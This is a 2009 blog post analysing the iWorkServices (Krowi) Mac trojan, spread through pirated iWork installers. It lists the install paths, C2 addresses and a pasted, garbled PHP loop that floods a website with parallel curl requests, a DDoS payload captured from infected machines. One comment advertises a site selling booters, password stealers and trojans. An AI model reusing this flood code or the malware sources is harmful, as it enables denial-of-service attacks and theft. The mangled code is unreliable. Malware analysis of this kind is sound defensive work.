Home > Malwares > Update: “iWorkServices” Not Just A Trojan

Update: “iWorkServices” Not Just A Trojan

Let’s call the bad iWork as Krowi.

So, the story starts when OS X user will download an iWork 09 installation package with serial key through BitTorrent.

files

Take note that  Krowi is often found on a package “iWork09.zip” with filesize 450.4MB. Upon extracting, you’ll find  NO “iWorkServices” here instead a main installation package named iWork09Trial.mpkg and an enticing serial.txt.

Upon inspecting the content of “iWork09Trial.mpkg” you’ll find nasty Krowi “iWorkServices.pkg” piggybacking.

iworkpackage

The file “preflight” contains a one line instruction, which is executing the mach-o binary file “iworkservices”.

When installed, this will create the following files:

/System/Library/StartupItems/iWorkServices/StartupParameters.plist

/System/Library/StartupItems/iWorkServices/iWorkServices

/usr/bin/iWorkServices

Since the system keep a copy of the installer, you’ll find this as well:

/Library/Receipts/iWorkServices.pkg

Once installed, you will find “iWorkServices” process is running in background and it will persistently attempts to report to its command and control channels.

69.92.177.146:59201

qwfojzlk.freehostia.com:1024

example

Krowi is a nasty P2P controlled bot that is similar to known Storm Worm.

Infected OS X users machine can be controlled remotely by the bot master.  It can be used to participate in a massive Distributed Denial of Service attack(DDoS) , install further application (like software from Pay-per-Install ), spam and distribute malware and may gather user data.

Looking further, this malware comes with a Lua interpreter which is described as “powerful, fast, light-weight, embeddable scripting language”. This could expand further the capability of the attacker to the affected machine.  An automated master could respond and push PHP script …

Imagine,  load and run!

++++++++++++++++

Update 24th Jan: I just want to link few infection report I found around the net that was able to capture PHP scripts running on their box: 

http://notahat.com/posts/28 

http://macmagazine.com.br/forum/index.php?showtopic=12056&pid=58190&st=0&#entry58190 

 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, "http://www.dollarcardmarketing.com"); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);)  

root 35113 32.4 0.2 88956 4952? R-r 10:02 1:54.60 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com&#8221;); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);) 

root 35112 31.8 0.2 88956 4936? R-r 10:02 1:54.67 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com&#8221;); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);) 

root 35064 31.2 0.2 88956 5048? R-r 10:00 4:00.37 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com&#8221;); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);) 

root 35111 31.2 0.2 88956 4944? R-r 10:02 1:55.37 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com&#8221;); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);) 

root 35100 31.1 0.2 88956 4952? R-r 10:02 2:00.98 php while (1) ($ mh = curl_multi_init (); $ ch = array (); for ($ i = 0; $ i <100; $ i + +) ($ ch R ^ [ $ i] = curl_init (); Icurl_setopt ^ ($ ch [$ i], CURLOPT_URL, “http://www.dollarcardmarketing.com&#8221;); Icurl_setopt ^ ($ ch [$ i], CURLOPT_HEADER, 0); ^ Icurl_setopt ($ ch [$ i], CURLOPT_RETURNTRANSFER, true); Icurl_multi_add_handle ^ ($ mh, $ ch [$ i]);) of (^ Icurl_multi_exec ($ mh, $ running);) while ($ running> 0) is ($ i = 0; $ i <100; $ i + +) (^ Icurl_multi_remove_handle ($ mh, $ ch [$ i]);) curl_multi_close ($ mh);)

  1. January 24, 2009 at 4:22 pm

    “… It can be used to participate in a massive Distributed Denial of Service attack(DDoS) ,…”

    That’s exactly what it did and it was quite a malicious attack indeed. We now know how… What we DON’T know is who or why?

    Here’s some further info from The Washington Post:

    http://voices.washingtonpost.com/securityfix/2009/01/pirated_iwork_software_infects.html

    Best Regards,

    John
    http://www.DollarCardMarketing.com

  2. May 16, 2009 at 2:44 am

    here you can download best booter, yahoo password stealer and undetectable trojans:

    satan-hacking.blogspot.com

    • Methusela Cebrian Ferrer
      May 16, 2009 at 11:26 am

      Thanks! let me know if you’ll find / create one in mac. (“,

  1. January 26, 2009 at 4:22 am

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: